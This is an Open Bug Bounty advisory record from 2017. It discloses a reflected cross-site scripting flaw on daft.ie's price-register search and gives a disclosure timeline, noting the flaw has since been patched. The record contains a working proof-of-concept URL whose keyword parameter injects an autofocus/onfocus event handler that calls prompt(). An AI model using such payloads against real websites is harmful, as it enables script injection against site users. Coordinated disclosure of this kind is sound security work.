daft.ie XSS vulnerability

2017-04-23T20:29:00
ID OBB:227314
Type openbugbounty
Reporter Random_Robbie
Modified 2017-06-05T12:27:00

Description

Vulnerable URL:
http://www.daft.ie/price-register/?cc_id=&a;_id%5B%5D=3917&min;_beds=*"'--!>&max;_beds=*&min;_price=*&max;_price=*&pt;_id=*&keyword;=x"autofocus/onfocus=prompt(String.fromCharCode(88,83,83,80,79,83,69,68))>&search;=Search%20%C2%BB
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 8976
VIP website status:| Yes

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 23 April, 2017 20:29 GMT
Generic security notifications sent to website owner| 23 April, 2017 20:31 GMT
Vulnerability details disclosed by researcher| 4 June, 2017 21:14 GMT
Vulnerability patched by the website owner| 5 June, 2017 12:27 GMT